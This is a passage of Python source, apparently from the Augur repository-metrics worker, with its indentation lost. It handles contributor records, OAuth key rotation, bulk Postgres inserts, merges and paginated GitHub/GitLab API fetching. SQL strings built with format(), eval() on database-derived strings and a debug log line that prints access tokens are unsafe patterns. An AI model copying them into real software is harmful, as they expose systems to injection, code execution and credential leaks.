'cntrb_company': company,
'cntrb_location': location,
'cntrb_created_at': contributor[0]['created_at'] if 'created_at' in contributor[0] else None,
'cntrb_canonical': None,
'gh_user_id': contributor[0]['id'],
'gh_login': contributor[0]['username'],
'gh_url': contributor[0]['web_url'],
'gh_html_url': None,
'gh_node_id': None,
'gh_avatar_url': contributor[0]['avatar_url'],
'gh_gravatar_id': None,
'gh_followers_url': None,
'gh_following_url': None,
'gh_gists_url': None,
'gh_starred_url': None,
'gh_subscriptions_url': None,
'gh_organizations_url': None,
'gh_repos_url': None,
'gh_events_url': None,
'gh_received_events_url': None,
'gh_type': None,
'gh_site_admin': None,
'tool_source': self.tool_source,
'tool_version': self.tool_version,
'data_source': self.data_source
}
result = self.db.execute(self.contributors_table.insert().values(cntrb))
self.logger.info("Primary key inserted into the contributors table: " + str(result.inserted_primary_key))
self.results_counter += 1
self.cntrb_id_inc = int(result.inserted_primary_key[0])
self.logger.info(f"Inserted contributor: {cntrb['cntrb_login']}\n")
return self.find_id_from_login(login, platform)
def get_owner_repo(self, git_url):
""" Gets the owner and repository names of a repository from a git url
:param git_url: String, the git url of a repository
:return: Tuple, includes the owner and repository names in that order
"""
split = git_url.split('/')
owner = split[-2]
repo = split[-1]
if '.git' == repo[-4:]:
repo = repo[:-4]
return owner, repo
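# Illustrative usage sketch (not part of the original source); `worker` and the url are
# hypothetical.
#
#   owner, repo = worker.get_owner_repo("https://github.com/chaoss/augur.git")
#   # owner == "chaoss", repo == "augur"  (a trailing ".git" is stripped)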
def get_max_id(self, table, column, default=25150, operations_table=False):
""" Gets the max value (usually used for id/pk's) of any Integer column
of any table
:param table: String, the table that consists of the column you want to
query a max value for
:param column: String, the column that you want to query the max value for
:param default: Integer, if there are no values in the
specified column, the value of this parameter will be returned
:param operations_table: Boolean, if True, signifies that the table/column to be
queried is in the augur_operations schema rather than the augur_data schema.
Default False
:return: Integer, the max value of the specified column/table
"""
maxIdSQL = s.sql.text("""
SELECT max({0}.{1}) AS {1}
FROM {0}
""".format(table, column))
db = self.db if not operations_table else self.helper_db
rs = pd.read_sql(maxIdSQL, db, params={})
if rs.iloc[0][column] is not None:
max_id = int(rs.iloc[0][column]) + 1
self.logger.info("Found max id for {} column in the {} table: {}\n".format(column, table, max_id))
else:
max_id = default
self.logger.warning("Could not find max id for {} column in the {} table... " +
"using default set to: {}\n".format(column, table, max_id))
return max_id
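# Illustrative usage sketch (not part of the original source); `worker` and the table/column
# names are hypothetical. get_max_id('issues', 'issue_id') would run
# "SELECT max(issues.issue_id) AS issue_id FROM issues" and return that max plus one,
# or the `default` argument when the column has no rows.
#
#   next_issue_pk = worker.get_max_id('issues', 'issue_id', default=25150)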
def get_table_values(self, cols, tables, where_clause=""):
""" Can query all values of any column(s) from any table(s)
with an optional where clause
:param cols: List of Strings, column(s) that user wants to query
:param tables: List of Strings, table(s) that user wants to query
:param where_clause: String, optional where clause to filter the values
queried
:return: Pandas DataFrame, contains all values queried in the columns, tables, and
optional where clause provided
"""
table_str = tables[0]
del tables[0]
col_str = cols[0]
del cols[0]
for table in tables:
table_str += ", " + table
for col in cols:
col_str += ", " + col
table_values_sql = s.sql.text("""
SELECT {} FROM {} {}
""".format(col_str, table_str, where_clause))
self.logger.info("Getting table values with the following PSQL query: \n{}\n".format(
table_values_sql))
values = pd.read_sql(table_values_sql, self.db, params={})
return values
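# Illustrative usage sketch (not part of the original source); `worker` and the column/table
# names are hypothetical. Note that the cols and tables lists are consumed in place
# (their first elements are deleted), so pass throwaway lists.
#
#   vals = worker.get_table_values(['cntrb_id', 'cntrb_login'], ['contributors'],
#                                  where_clause="WHERE cntrb_login IS NOT NULL")
#   # builds: SELECT cntrb_id, cntrb_login FROM contributors WHERE cntrb_login IS NOT NULL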
def init_oauths(self, platform='github'):
self.oauths = []
self.headers = None
self.logger.info("Trying initialization.")
# Make a list of the API key in the config combined with the keys stored in the database
# Select endpoint to hit solely to retrieve rate limit
# information from headers of the response
# Adjust header keys needed to fetch rate limit information from the API responses
if platform == 'github':
url = "https://api.github.com/users/gabe-heim"
oauthSQL = s.sql.text("""
SELECT * FROM worker_oauth WHERE access_token <> '{}' and platform = 'github'
""".format(self.config['gh_api_key']))
key_name = 'gh_api_key'
rate_limit_header_key = "X-RateLimit-Remaining"
rate_limit_reset_header_key = "X-RateLimit-Reset"
elif platform == 'gitlab':
url = "https://gitlab.com/api/v4/version"
oauthSQL = s.sql.text("""
SELECT * FROM worker_oauth WHERE access_token <> '{}' and platform = 'gitlab'
""".format(self.config['gitlab_api_key']))
key_name = 'gitlab_api_key'
rate_limit_header_key = 'ratelimit-remaining'
rate_limit_reset_header_key = 'ratelimit-reset'
for oauth in [{'oauth_id': 0, 'access_token': self.config[key_name]}] + json.loads(
pd.read_sql(oauthSQL, self.helper_db, params={}).to_json(orient="records")
):
if platform == 'github':
self.headers = {'Authorization': 'token %s' % oauth['access_token']}
elif platform == 'gitlab':
self.headers = {'Authorization': 'Bearer %s' % oauth['access_token']}
response = requests.get(url=url, headers=self.headers)
self.oauths.append({
'oauth_id': oauth['oauth_id'],
'access_token': oauth['access_token'],
'rate_limit': int(response.headers[rate_limit_header_key]),
'seconds_to_reset': (
datetime.datetime.fromtimestamp(
int(response.headers[rate_limit_reset_header_key])
) - datetime.datetime.now()
).total_seconds()
})
self.logger.debug("Found OAuth available for use: {}".format(self.oauths[-1]))
if len(self.oauths) == 0:
self.logger.info(
"No API keys detected, please include one in your config or in the "
"worker_oauths table in the augur_operations schema of your database."
)
# First key to be used will be the one specified in the config (first element in
# self.oauths array will always be the key in use)
if platform == 'github':
self.headers = {'Authorization': 'token %s' % self.oauths[0]['access_token']}
elif platform == 'gitlab':
self.headers = {'Authorization': 'Bearer %s' % self.oauths[0]['access_token']}
self.logger.info("OAuth initialized\n")
def bulk_insert(
self, table, insert=[], update=[], unique_columns=[], update_columns=[],
max_attempts=3, attempt_delay=3, increment_counter=True, convert_float_int=False
):
""" Performs bulk inserts/updates of the given data to the given table
:param table: String, name of the table that we are inserting/updating rows
:param insert: List of dicts, data points to insert
:param update: List of dicts, data points to update, only needs key/value
pairs of the update_columns and the unique_columns
:param unique_columns: List of strings, column names that would uniquely identify any
given data point
:param update_columns: List of strings, names of columns that are being updated
:param max_attempts: Integer, number of attempts to perform on inserting/updating
before moving on
:param attempt_delay: Integer, number of seconds to wait in between attempts
:returns: SQLAlchemy database execution response object(s), contains metadata
about number of rows inserted etc. This data is not often used.
"""
self.logger.info(
f"{len(insert)} insertions are needed and {len(update)} "
f"updates are needed for {table}"
)
update_result = None
insert_result = None
if len(update) > 0:
attempts = 0
update_start_time = time.time()
while attempts < max_attempts:
try:
update_result = self.db.execute(
table.update().where(
eval(
' and '.join(
[
f"self.{table}_table.c.{key} == bindparam('b_{key}')"
for key in unique_columns
]
)
)
).values(
{key: key for key in update_columns}
),
update
)
if increment_counter:
self.update_counter += update_result.rowcount
self.logger.info(
f"Updated {update_result.rowcount} rows in "
f"{time.time() - update_start_time} seconds"
)
break
except Exception as e:
self.logger.info(f"Warning! Error bulk updating data: {e}")
time.sleep(attempt_delay)
attempts += 1
if len(insert) > 0:
insert_start_time = time.time()
def psql_insert_copy(table, conn, keys, data_iter):
"""
Execute SQL statement inserting data
Parameters
----------
table : pandas.io.sql.SQLTable
conn : sqlalchemy.engine.Engine or sqlalchemy.engine.Connection
keys : list of str
Column names
data_iter : Iterable that iterates the values to be inserted
"""
# gets a DBAPI connection that can provide a cursor
dbapi_conn = conn.connection
with dbapi_conn.cursor() as cur:
s_buf = io.StringIO()
writer = csv.writer(s_buf)
writer.writerows(data_iter)
s_buf.seek(0)
columns = ', '.join('"{}"'.format(k) for k in keys)
if table.schema:
table_name = '{}.{}'.format(table.schema, table.name)
else:
table_name = table.name
sql = 'COPY {} ({}) FROM STDIN WITH CSV'.format(
table_name, columns)
cur.copy_expert(sql=sql, file=s_buf)
df = pd.DataFrame(insert)
if convert_float_int:
df = self._convert_float_nan_to_int(df)
df.to_sql(
name=table.name,
con=self.db,
if_exists="append",
index=False,
method=psql_insert_copy
)
if increment_counter:
self.insert_counter += len(insert)
self.logger.info(
f"Inserted {len(insert)} rows in {time.time() - insert_start_time} seconds "
"thanks to postgresql's COPY FROM CSV! :)"
)
return insert_result, update_result
def text_clean(self, data, field):
""" "Cleans" the provided field of each dict in the list of dicts provided
by removing NUL (C text termination) characters
Example: "\u0000"
:param data: List of dicts
:param field: String
:returns: Same data list with each element's field updated with NUL characters
removed
"""
return [
{
**data_point,
field: data_point[field].replace("\x00", "\uFFFD")
} for data_point in data
]
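# Illustrative usage sketch (not part of the original source); `worker` and the field
# name are hypothetical. NUL bytes are swapped for the Unicode replacement character
# so the strings can be stored in Postgres text columns.
#
#   worker.text_clean([{'body': 'bad\x00text'}], 'body')
#   # -> [{'body': 'bad\ufffdtext'}]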
def _add_nested_columns(self, df, column_names):
# todo: support deeper nests (>1) and only expand necessary columns
# todo: merge with _get_data_set_columns
for column in column_names:
if '.' not in column:
continue
root = column.split('.')[0]
if root not in df.columns:
df[root] = None
expanded_column = pd.DataFrame(
df[root].where(df[root].notna(), lambda x: [{}]).tolist()
)
expanded_column.columns = [
f'{root}.{attribute}' for attribute in expanded_column.columns
]
if column not in expanded_column.columns:
expanded_column[column] = None
try:
df = df.join(expanded_column)
except ValueError:
# columns already added (happens if trying to expand the same column twice)
# TODO: Catch this before by only looping over unique prefixes?
pass
return df
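# Conceptual sketch of _add_nested_columns (not part of the original source; column names
# are hypothetical). Given a DataFrame with a dict-valued column 'user' and
# column_names=['user.login'], the dict column is expanded so a top-level 'user.login'
# column exists and can later be used as a merge/join key:
#
#   df = pd.DataFrame([{'id': 1, 'user': {'login': 'octocat', 'id': 583231}}])
#   df = worker._add_nested_columns(df, ['user.login'])
#   # df now also has 'user.login' and 'user.id' columns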
def enrich_cntrb_id(
self, data, key, action_map_additions={'insert': {'source': [], 'augur': []}},
platform='github', prefix=''
):
if not len(data):
return data
self.logger.info(f"Enriching contributor ids for {len(data)} data points...")
source_df = pd.DataFrame(data)
expanded_source_df = self._add_nested_columns(
source_df.copy(), [key] + action_map_additions['insert']['source']
)
# Insert cntrbs that are not in db
cntrb_action_map = {
'insert': {
'source': [key] + action_map_additions['insert']['source'],
'augur': ['cntrb_login'] + action_map_additions['insert']['augur']
}
}
source_cntrb_insert, _ = self.new_organize_needed_data(
expanded_source_df.to_dict(orient='records'), augur_table=self.contributors_table,
action_map=cntrb_action_map
)
cntrb_insert = [
{
'cntrb_login': contributor[f'{prefix}login'],
'cntrb_created_at': None if (
f'{prefix}created_at' not in contributor
) else contributor[f'{prefix}created_at'],
'cntrb_email': None if f'{prefix}email' not in contributor else contributor[f'{prefix}email'],
'cntrb_company': None if f'{prefix}company' not in contributor else contributor[f'{prefix}company'],
'cntrb_location': None if (
f'{prefix}location' not in contributor
) else contributor[f'{prefix}location'],
'gh_user_id': None if (
not contributor[f'{prefix}id']
) else int(float(contributor[f'{prefix}id'])),
'gh_login': contributor[f'{prefix}login'],
'gh_url': contributor[f'{prefix}url'],
'gh_html_url': contributor[f'{prefix}html_url'],
'gh_node_id': contributor[f'{prefix}node_id'],
'gh_avatar_url': contributor[f'{prefix}avatar_url'],
'gh_gravatar_id': contributor[f'{prefix}gravatar_id'],
'gh_followers_url': contributor[f'{prefix}followers_url'],
'gh_following_url': contributor[f'{prefix}following_url'],
'gh_gists_url': contributor[f'{prefix}gists_url'],
'gh_starred_url': contributor[f'{prefix}starred_url'],
'gh_subscriptions_url': contributor[f'{prefix}subscriptions_url'],
'gh_organizations_url': contributor[f'{prefix}organizations_url'],
'gh_repos_url': contributor[f'{prefix}repos_url'],
'gh_events_url': contributor[f'{prefix}events_url'],
'gh_received_events_url': contributor[f'{prefix}received_events_url'],
'gh_type': contributor[f'{prefix}type'],
'gh_site_admin': contributor[f'{prefix}site_admin'],
'tool_source': self.tool_source,
'tool_version': self.tool_version,
'data_source': self.data_source
} for contributor in source_cntrb_insert if contributor[f'{prefix}login']
]
self.bulk_insert(self.contributors_table, cntrb_insert)
# Query db for inserted cntrb pkeys and add to shallow level of data
# Query
cntrb_pk_name = list(self.contributors_table.primary_key)[0].name
session = s.orm.Session(self.db)
inserted_pks = pd.DataFrame(
session.query(
self.contributors_table.c[cntrb_pk_name], self.contributors_table.c.cntrb_login,
self.contributors_table.c.gh_node_id
).distinct(self.contributors_table.c.cntrb_login).order_by(
self.contributors_table.c.cntrb_login, self.contributors_table.c[cntrb_pk_name]
).all(), columns=[cntrb_pk_name, 'cntrb_login', 'gh_node_id']
).to_dict(orient='records')
session.close()
# Prepare for merge
source_columns = sorted(list(source_df.columns))
necessary_columns = sorted(list(set(source_columns + cntrb_action_map['insert']['source'])))
(source_table, inserted_pks_table), metadata, session = self._setup_postgres_merge(
[
expanded_source_df[necessary_columns].to_dict(orient='records'),
inserted_pks
], sort=True
)
final_columns = [cntrb_pk_name] + sorted(list(set(necessary_columns)))
# Merge
source_pk = pd.DataFrame(
session.query(
inserted_pks_table.c.cntrb_id, source_table
).join(
source_table,
eval(
' and '.join(
[
(
f"inserted_pks_table.c['{table_column}'] "
f"== source_table.c['{source_column}']"
) for table_column, source_column in zip(
cntrb_action_map['insert']['augur'],
cntrb_action_map['insert']['source']
)
]
)
)
).all(), columns=final_columns
)
# Cleanup merge
source_pk = self._eval_json_columns(source_pk)
self._close_postgres_merge(metadata, session)
self.logger.info(
"Contributor id enrichment successful, result has "
f"{len(source_pk)} data points.\n"
)
return source_pk.to_dict(orient='records')
def enrich_data_primary_keys(
self, source_data, table, gh_merge_fields, augur_merge_fields, in_memory=False
):
self.logger.info("Preparing to enrich data.\n")
if len(source_data) == 0:
self.logger.info("There is no source data to enrich.\n")
return source_data
source_df = self._add_nested_columns(pd.DataFrame(source_data), gh_merge_fields)
if not in_memory:
source_pk_columns = list(source_df.columns)
source_pk_columns.insert(0, list(table.primary_key)[0].name)
(source_table, ), metadata, session = self._setup_postgres_merge(
# [self._get_data_set_columns(source_data, gh_merge_fields)]
[source_df.to_dict(orient='records')]
)
source_pk = pd.DataFrame(
# eval(
# "session.query("
# + ", ".join(
# [
# f"table.c['{column}']" for column in [list(table.primary_key)[0].name]
# + augur_merge_fields
# ]
# )
# + ")"
# )
session.query(
table.c[list(table.primary_key)[0].name],
source_table
# eval(
# f"table.c['{list(table.primary_key)[0].name}'], "
# + ", ".join(
# [
# f"source_table.c['{column}']" for column in source_pk_columns
# ]
# )
# )
).join(
source_table,
eval(
' and '.join(
[
f"table.c['{table_column}'] == source_table.c['{source_column}']"
for table_column, source_column in zip(
augur_merge_fields, gh_merge_fields
)
]
)
)
).all(), columns=source_pk_columns # gh_merge_fields
)
source_pk = self._eval_json_columns(source_pk)
# source_pk, source_df = self.sync_df_types(
# source_pk, source_df, gh_merge_fields, gh_merge_fields
# )
# source_pk = source_pk.merge(source_df, how='inner', on=gh_merge_fields)
self.logger.info("source_pk calculated successfully")
self._close_postgres_merge(metadata, session)
self.logger.info("Done")
else:
# s_tuple = s.tuple_([table.c[field] for field in augur_merge_fields])
# s_tuple.__dict__['clauses'] = s_tuple.__dict__['clauses'][0].effective_value
# s_tuple.__dict__['_type_tuple'] = []
# for field in augur_merge_fields:
# s_tuple.__dict__['_type_tuple'].append(table.c[field].__dict__['type'])
# try:
# primary_keys = self.db.execute(s.sql.select(
# [table.c[field] for field in augur_merge_fields] + [table.c[list(table.primary_key)[0].name]]
# ).where(
# s_tuple.in_(
# list(source_df[gh_merge_fields].itertuples(index=False))
# ))).fetchall()
# except psycopg2.errors.StatementTooComplex as e:
self.logger.info("Retrieve pk statement too complex, querying all instead " +
"and performing partitioned merge.\n")
all_primary_keys = self.db.execute(s.sql.select(
[table.c[field] for field in augur_merge_fields] + [table.c[list(table.primary_key)[0].name]]
)).fetchall()
self.logger.info("Queried all")
all_primary_keys_df = pd.DataFrame(all_primary_keys,
columns=augur_merge_fields + [list(table.primary_key)[0].name])
self.logger.info("Converted to df")
source_df, all_primary_keys_df = self.sync_df_types(source_df, all_primary_keys_df,
gh_merge_fields, augur_merge_fields)
self.logger.info("Synced df types")
partitions = math.ceil(len(source_df) / 600)  # divisor was previously 1000
attempts = 0
while attempts < 50:
try:
source_pk = pd.DataFrame()
self.logger.info(f"Trying {partitions} partitions of new data, {len(all_primary_keys_df)} " +
"pk data points to enrich\n")
for sub_df in numpy.array_split(source_df, partitions):
self.logger.info(f"Trying a partition, len {len(sub_df)}\n")
source_pk = pd.concat([ source_pk, sub_df.merge(all_primary_keys_df, suffixes=('','_table'),
how='inner', left_on=gh_merge_fields, right_on=augur_merge_fields) ])
self.logger.info(f"source_pk merge: {len(sub_df)} worked\n")
break
except MemoryError as e:
self.logger.info(f"new_data ({sub_df.shape}) is too large to allocate memory for " +
f"source_pk df merge.\nMemoryError: {e}\nTrying again with {partitions + 1} partitions...\n")
partitions += 1
attempts += 1
# self.logger.info(f"End attempt # {attempts}\n")
if attempts >= 50:
self.logger.info("Max source_pk merge attempts exceeded, cannot perform " +
"updates on this repo.\n")
else:
self.logger.info(f"Data enrichment successful, length: {len(source_pk)}\n")
# all_primary_keys_df.to_json(path_or_buf='all_primary_keys_df.json', orient='records')
# all_primary_keys_dask_df = dd.from_pandas(all_primary_keys_df, chunksize=1000)
# source_dask_df = dd.from_pandas(source_df, chunksize=1000)
# result = json.loads(source_dask_df.merge(all_primary_keys_dask_df, suffixes=('','_table'),
# how='inner', left_on=gh_merge_fields, right_on=augur_merge_fields).compute(
# ).to_json(default_handler=str, orient='records'))
return source_pk.to_dict(orient='records')
# if len(primary_keys) > 0:
# primary_keys_df = pd.DataFrame(primary_keys,
# columns=augur_merge_fields + [list(table.primary_key)[0].name])
# else:
# self.logger.info("There are no inserted primary keys to enrich the source data with.\n")
# return []
# source_df, primary_keys_df = self.sync_df_types(source_df, primary_keys_df,
# gh_merge_fields, augur_merge_fields)
# source_df = dd.from_pandas(source_df, chunksize=1000)
# primary_keys_df = dd.from_pandas(primary_keys_df, chunksize=1000)
# result = json.loads(source_df.merge(primary_keys_df, suffixes=('','_table'),
# how='inner', left_on=gh_merge_fields, right_on=augur_merge_fields).compute().to_json(
# default_handler=str, orient='records'))
# self.logger.info("Data enrichment successful.\n")
# return result
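# Illustrative call sketch (not part of the original source; the table and field names are
# hypothetical). Each source record gains the matching table primary key column so it can
# be used as a foreign key in later inserts:
#
#   enriched = worker.enrich_data_primary_keys(
#       issue_events, worker.issues_table,
#       gh_merge_fields=['issue.id'], augur_merge_fields=['gh_issue_id'])
#   # every dict in `enriched` now also carries the issues table pk column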
def multi_thread_urls(self, all_urls, max_attempts=5, platform='github'):
"""
:param all_urls: List of tuples, each of the form (url, extra_data dict); the extra_data
    dict is merged into every data point returned from that url
"""
if not len(all_urls):
self.logger.info("No urls to multithread, returning blank list.\n")
return []
def load_url(url, extra_data={}):
try:
html = requests.get(url, stream=True, headers=self.headers)
return html, extra_data
except requests.exceptions.RequestException as e:
self.logger.info(e, url)
self.logger.info("Beginning to multithread API endpoints.")
start = time.time()
all_data = []
valid_url_count = len(all_urls)
partitions = math.ceil(len(all_urls) / 600)
self.logger.info(f"{len(all_urls)} urls to process. Trying {partitions} partitions. " +
f"Using {max(multiprocessing.cpu_count()//8, 1)} threads.")
for urls in numpy.array_split(all_urls, partitions):
attempts = 0
self.logger.info(f"Total data points collected so far: {len(all_data)}")
while len(urls) > 0 and attempts < max_attempts:
with concurrent.futures.ThreadPoolExecutor(
max_workers=max(multiprocessing.cpu_count()//8, 1)
) as executor:
# Start the load operations and mark each future with its URL
future_to_url = {executor.submit(load_url, *url): url for url in urls}
self.logger.info("Multithreaded urls and returned status codes:")
count = 0
for future in concurrent.futures.as_completed(future_to_url):
if count % 100 == 0:
self.logger.info(
f"Processed {len(all_data)} / {valid_url_count} urls. "
f"{len(urls)} remaining in this partition."
)
count += 1
url = future_to_url[future]
try:
response, extra_data = future.result()
if response.status_code != 200:
self.logger.info(
f"Url: {url[0]} ; Status code: {response.status_code}"
)
if response.status_code == 403 or response.status_code == 401: # 403 is rate limit, 404 is not found, 401 is bad credentials
self.update_rate_limit(response, platform=platform)
continue
elif response.status_code == 200:
try:
page_data = response.json()
except:
page_data = json.loads(json.dumps(response.text))
page_data = [{**data, **extra_data} for data in page_data]
all_data += page_data
if 'last' in response.links and "&page=" not in url[0]:
urls += [
(url[0] + f"&page={page}", extra_data) for page in range(
2, int(response.links['last']['url'].split('=')[-1]) + 1
)
]
urls = numpy.delete(urls, numpy.where(urls == url), axis=0)
elif response.status_code == 404:
urls = numpy.delete(urls, numpy.where(urls == url), axis=0)
self.logger.info(f"Not found url: {url}\n")
else:
self.logger.info(
f"Unhandled response code: {response.status_code} {url}\n"
)
except Exception as e:
self.logger.info(
f"{url} generated an exception: {traceback.format_exc()}\n"
)
attempts += 1
self.logger.info(
f"Processed {valid_url_count} urls and got {len(all_data)} data points "
f"in {time.time() - start} seconds thanks to multithreading!\n"
)
return all_data
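# Illustrative usage sketch (not part of the original source; the urls and extra data are
# hypothetical). Each element of all_urls is a (url, extra_data) tuple; the extra_data
# dict is merged into every data point fetched from that url, and paginated endpoints
# have their remaining pages appended automatically.
#
#   urls = [(f"https://api.github.com/repos/octocat/hello-world/issues/{n}/events"
#            "?per_page=100", {'issue_id': n}) for n in (1, 2, 3)]
#   events = worker.multi_thread_urls(urls)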
def _eval_json_columns(self, df):
if not len(df):
return df
for column in df.columns:
first_valid_value = df.fillna(method='bfill').iloc[0][column]
if isinstance(first_valid_value, str):
if (
first_valid_value[0] == '{' and first_valid_value[-1] == '}'
or first_valid_value[0] == '[' and first_valid_value[-1] == ']'
):
df[column] = df[column].fillna("'null_placeholder'").apply(eval).replace(
"null_placeholder", numpy.nan
).where(df[column].notna(), lambda x: [{}])
return df
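# Conceptual note on _eval_json_columns (not part of the original source). After the
# Postgres round-trip used for merging, dict/list values come back as strings such as
# "{'login': 'octocat'}" or "[1, 2]"; this helper eval's them back into Python objects,
# leaving other columns untouched.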
def new_organize_needed_data(
self, new_data, augur_table=None, where_clause=True, action_map={}
):
self.logger.info(f"Beginning to organize needed data from {len(new_data)} data points...")
if len(new_data) == 0:
return [], []
new_data_columns = pd.DataFrame(new_data).columns
# # new_data_columns = copy.deepcopy(action_map['insert']['source'])
# table_value_columns = copy.deepcopy(action_map['insert']['augur'])
#
# if 'update' in action_map:
# # new_data_columns += action_map['update']['source']
# table_value_columns += action_map['update']['augur']
(new_data_table, ), metadata, session = self._setup_postgres_merge(
[
new_data
# self._get_data_set_columns(new_data, new_data_columns)
]
)
need_insertion = pd.DataFrame(
session.query(new_data_table).join(
augur_table,
eval(
' and '.join(
[
f"augur_table.c['{table_column}'] == new_data_table.c['{source_column}']"
for table_column, source_column in zip(
action_map['insert']['augur'], action_map['insert']['source']
)
]
)
), isouter=True
).filter(
augur_table.c[action_map['insert']['augur'][0]] == None
).all(), columns=new_data_columns # table_value_columns
)
need_insertion = self._eval_json_columns(need_insertion)
# new_data_df = pd.DataFrame(new_data)
# need_insertion, new_data_df = self.sync_df_types(
# need_insertion, new_data_df, table_value_columns, new_data_columns
# )
# need_insertion = need_insertion.merge(
# new_data_df, how='inner', left_on=table_value_columns, right_on=new_data_columns
# )
self.logger.info("need_insertion calculated successfully")
need_updates = pd.DataFrame(columns=new_data_columns)
if 'update' in action_map:
need_updates = pd.DataFrame(
session.query(new_data_table).join(
augur_table,
s.and_(
eval(
' and '.join(
[
(
f"augur_table.c.{table_column} "
f"== new_data_table.c.{source_column}"
) for table_column, source_column in zip(
action_map['insert']['augur'],
action_map['insert']['source']
)
]
)
),
eval(
' and '.join(
[
(
f"augur_table.c.{table_column} "
f"!= new_data_table.c.{source_column}"
) for table_column, source_column in zip(
action_map['update']['augur'],
action_map['update']['source']
)
]
)
)
)
).all(), columns=new_data_columns
)
self.logger.info("need_updates calculated successfully")
self._close_postgres_merge(metadata, session)
self.logger.info(
f"Table needs {len(need_insertion)} insertions and "
f"{len(need_updates)} updates.\n"
)
return need_insertion.to_dict('records'), need_updates.to_dict('records')
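# Illustrative action_map sketch (not part of the original source; the field names are
# hypothetical). The 'insert' pairs identify a record (anti-join against the augur table),
# while the 'update' pairs flag records whose tracked values changed:
#
#   action_map = {
#       'insert': {'source': ['id'], 'augur': ['gh_issue_id']},
#       'update': {'source': ['state'], 'augur': ['issue_state']}
#   }
#   inserts, updates = worker.new_organize_needed_data(
#       page_data, augur_table=worker.issues_table, action_map=action_map)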
def new_paginate_endpoint(
self, url, action_map={}, table=None, where_clause=True, platform='github'
):
page_number = 1
multiple_pages = False
need_insertion = []
need_update = []
all_data = []
forward_pagination = True
backwards_activation = False
last_page_number = -1
while True:
# Multiple attempts to hit endpoint
num_attempts = 0
success = False
while num_attempts < 10:
self.logger.info("hitting an endpiont")
# f"Hitting endpoint: ...\n"
# f"{url.format(page_number)} on page number. \n")
try:
response = requests.get(url=url.format(page_number), headers=self.headers)
except TimeoutError as e:
self.logger.info("Request timed out. Sleeping 10 seconds and trying again...\n")
time.sleep(10)
continue
self.update_rate_limit(response, platform=platform)
try:
page_data = response.json()
except:
page_data = json.loads(json.dumps(response.text))
if type(page_data) == list:
success = True
break
elif type(page_data) == dict:
self.logger.info("Request returned a dict: {}\n".format(page_data))
if page_data['message'] == "Not Found":
self.logger.warning(
"Github repo was not found or does not exist for endpoint: "
f"{url.format(page_number)}\n"
)
break
if "You have triggered an abuse detection mechanism." in page_data['message']:
num_attempts -= 1
self.update_rate_limit(response, temporarily_disable=True,platform=platform)
if page_data['message'] == "Bad credentials":
self.update_rate_limit(response, bad_credentials=True, platform=platform)
elif type(page_data) == str:
self.logger.info(f"Warning! page_data was string: {page_data}\n")
if "<!DOCTYPE html>" in page_data:
self.logger.info("HTML was returned, trying again...\n")
elif len(page_data) == 0:
self.logger.warning("Empty string, trying again...\n")
else:
try:
page_data = json.loads(page_data)
success = True
break
except:
pass
num_attempts += 1
if not success:
break
# Success
# Determine if continued pagination is needed
if len(page_data) == 0:
self.logger.info("Response was empty, breaking from pagination.\n")
break
all_data += page_data
if not forward_pagination:
# Checking contents of requests with what we already have in the db
page_insertions, page_updates = self.new_organize_needed_data(
page_data, augur_table=table, action_map=action_map
)
# Reached a page where we already have all tuples
if len(need_insertion) == 0 and len(need_update) == 0 and \
backwards_activation:
self.logger.info(
"No more pages with unknown tuples, breaking from pagination.\n"
)
break
need_insertion += page_insertions
need_update += page_updates
# Find last page so we can decrement from there
if 'last' in response.links and last_page_number == -1:
if platform == 'github':
last_page_number = int(response.links['last']['url'][-6:].split('=')[1])
elif platform == 'gitlab':
last_page_number = int(response.links['last']['url'].split('&')[2].split('=')[1])
if not forward_pagination and not backwards_activation:
page_number = last_page_number
backwards_activation = True
self.logger.info("Analyzation of page {} of {} complete\n".format(page_number,
int(last_page_number) if last_page_number != -1 else "*last page not known*"))
if (page_number <= 1 and not forward_pagination) or \
(page_number >= last_page_number and forward_pagination):
self.logger.info("No more pages to check, breaking from pagination.\n")
break
page_number = page_number + 1 if forward_pagination else page_number - 1
if forward_pagination:
need_insertion, need_update = self.new_organize_needed_data(
all_data, augur_table=table, action_map=action_map
)
return {
'insert': need_insertion,
'update': need_update,
'all': all_data
}
def paginate_endpoint(
self, url, action_map={}, table=None, where_clause=True, platform='github', in_memory=True
):
table_values = self.db.execute(
s.sql.select(self.get_relevant_columns(table, action_map)).where(where_clause)
).fetchall()
page_number = 1
multiple_pages = False
need_insertion = []
need_update = []
all_data = []
forward_pagination = True
backwards_activation = False
last_page_number = -1
while True:
# Multiple attempts to hit endpoint
num_attempts = 0
success = False
while num_attempts < 10:
self.logger.info(f"Hitting endpoint: {url.format(page_number)}...\n")
try:
response = requests.get(url=url.format(page_number), headers=self.headers)
except TimeoutError as e:
self.logger.info("Request timed out. Sleeping 10 seconds and trying again...\n")
time.sleep(10)
continue
self.update_rate_limit(response, platform=platform)
try:
page_data = response.json()
except:
page_data = json.loads(json.dumps(response.text))
if type(page_data) == list:
success = True
break
elif type(page_data) == dict:
self.logger.info("Request returned a dict: {}\n".format(page_data))
if page_data['message'] == "Not Found":
self.logger.warning(
"Github repo was not found or does not exist for endpoint: "
f"{url.format(page_number)}\n"
)
break
if "You have triggered an abuse detection mechanism." in page_data['message']:
num_attempts -= 1
self.update_rate_limit(response, temporarily_disable=True,platform=platform)
if page_data['message'] == "Bad credentials":
self.update_rate_limit(response, bad_credentials=True, platform=platform)
elif type(page_data) == str:
self.logger.info(f"Warning! page_data was string: {page_data}\n")
if "<!DOCTYPE html>" in page_data:
self.logger.info("HTML was returned, trying again...\n")
elif len(page_data) == 0:
self.logger.warning("Empty string, trying again...\n")
else:
try:
page_data = json.loads(page_data)
success = True
break
except:
pass
num_attempts += 1
if not success:
break
# Success
# Determine if continued pagination is needed
if len(page_data) == 0:
self.logger.info("Response was empty, breaking from pagination.\n")
break
all_data += page_data
if not forward_pagination:
# Checking contents of requests with what we already have in the db
page_insertions, page_updates = self.organize_needed_data(
page_data, table_values, list(table.primary_key)[0].name,
action_map, in_memory=True
)
# Reached a page where we already have all tuples
if len(need_insertion) == 0 and len(need_update) == 0 and \
backwards_activation:
self.logger.info(
"No more pages with unknown tuples, breaking from pagination.\n"
)
break
need_insertion += page_insertions
need_update += page_updates
# Find last page so we can decrement from there
if 'last' in response.links and last_page_number == -1:
if platform == 'github':
last_page_number = int(response.links['last']['url'][-6:].split('=')[1])
elif platform == 'gitlab':
last_page_number = int(response.links['last']['url'].split('&')[2].split('=')[1])
if not forward_pagination and not backwards_activation:
page_number = last_page_number
backwards_activation = True
self.logger.info("Analyzation of page {} of {} complete\n".format(page_number,
int(last_page_number) if last_page_number != -1 else "*last page not known*"))
if (page_number <= 1 and not forward_pagination) or \
